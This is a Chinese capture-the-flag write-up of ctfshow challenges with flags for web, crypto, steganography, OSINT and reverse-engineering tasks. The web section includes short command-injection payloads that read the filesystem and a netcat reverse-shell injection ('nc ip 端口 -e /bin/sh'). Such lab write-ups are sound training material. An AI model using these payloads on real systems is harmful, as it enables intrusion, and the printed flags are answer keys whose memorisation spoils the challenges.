Web
web签到
在做的时候源码是直接手测发现有长度限制 7 位
在源码中也可以看到 js 代码
抓包后可以测得前后端都被过滤
可以直接一条命令
ls /*>1
在 /api/ 下访问下载文件 1 目录全在里面
但是只能读出目录
在 /api/ 下访问下载文件 1 目录全在里面
但是只能读出目录
使用 nl 命令可以直接读出 flag
nl /*>1
easy_cmd
由于题目连了外网且可以使用 nc
监听
nc -lvvp 9999
反弹
cmd=nc ip 端口 -e /bin/sh
cat /secret
ctfshow{3ce9542d-04e3-413a-9670-fefde86f66b4}
Crypto
密码签到
大牛在今年的hvv过程中,渗透进某业务系统,发现了密文,可是不知道如何解出明文,你能帮他找出来吗?
已知密文由两部分组成,后面的推测为秘钥
密文如下:
y3rmc2hvd3tjcnlwdg9fc2lnbmlux2lzx2vhc3l9-a0004008a0
很显然密文前面的是 base64 的变异
先解看看
后面的密钥 a0004008a0 转为二进制
y3rmc2hvd3tjcnlwdg9fc2lnbmlux2lzx2vhc3l9
1010000000000000010000000000100010100000
1 为大写
Y3Rmc2hvd3tjcnlwdG9fc2lnbmluX2lzX2Vhc3l9
ctfshow{crypto_signin_is_easy}
MISC
杂项签到
16 进制末尾可以看到
ctfshow{misc_sign_is_easy}
你会lsb吗
打开附件拖进 winhex 看到 16 进制颠倒,文件逆序
with open('zip','rb') as f:
with open('out.zip','wb') as g:
g.write(f.read()[::-1])
解压得到 stego.png
分析发现末尾多出个 ctfshow
结合提示 lsb ,使用 cloacked-pixel 解
python2 lsb.py extract stego.png 1.txt ctfshow
解出来的文本在 windows txt 看一般正常
是一行 emoji
aghorler.github.io/emoji-aes/
key 仍为 ctfshow
Rotation : 2
a = 🏎
ctfshow{D0u_Y0u_7now_em0js-AES}
海盗的密码
阿卜杜拉希.三哈.穆罕默德是一名来自索马里的海盗,当他不工作的时候,就喜欢窝在家里上上网,学学安全方面的知识。
听说他喜欢用ip地址做密码,你能发现他的秘密么?
搜索索马里 ip
注意开始 ip 和 结束 ip
我是用 ARCHPR 跑的,ARCHPR 掩码格式需要注意
197.157.24?.??
197.157.240.00 - 197.157.249.99
197.157.24?.???
197.157.240.000 - 197.157.249.999
OSINT
社工签到
大牛梦寐以求的地方,你能找到照片所属小镇名字吗?
格式ctfshow{小镇名字}
例如ctfshow{童话小镇}
百度识图
ctfshow{天涯小镇}
迷失的大象
图中是去年一路北上的大象,出发时有17头,但是中途一对大象喝醉,被遣返回原籍,剩15头了,你能找到那对象回哪里去了吗?
flag格式ctfshow{**原籍县区全称**}
例如:
ctfshow{寻甸回族彝族自治县}
搜索引擎
搜普洱墨江
ctfshow{墨江哈尼族自治县}
大飞机
请根据图中线索,找到飞机航班号,**字母大写**
格式ctfshow{航班号}
如:ctfshow{FK777}
北京到纽约的航班
搜索可以知道国航 CA
国际航班三位数
ctfshow{CA981}
RE
逆向签到
在 welcome 上面发现猫腻
7B776F6873667463h -> {wohsftc
5F6E6769735F6572h -> _ngis_er
5F797361655F7369h -> _ysae_si
由于先进后出,需要倒过来
ctfshow{re_sign_is_easy_}